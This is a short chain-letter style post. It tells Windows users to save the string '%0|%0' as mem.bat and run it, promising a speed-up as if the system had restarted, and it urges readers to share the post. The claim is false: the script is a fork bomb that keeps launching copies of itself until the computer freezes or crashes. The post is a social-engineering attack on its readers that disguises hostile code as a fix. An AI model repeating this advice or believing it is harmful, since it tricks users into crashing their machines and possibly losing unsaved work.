ATTENTION: If you need a quick fix for a slow system, you should try this new solution that was just found.

What you need to do is open Notepad, type "%0|%0" in (without quotes) and save the file as "mem.bat" (IMPORTANT! it must not have .txt at the end!).

When you've saved this file, it should have an icon with gears on it. Run it by double-clicking. It's a little bit of a clever hack in script form to boost performance, as if the system was just restarted. Please copy and paste this status and share this awesome fix with the world!
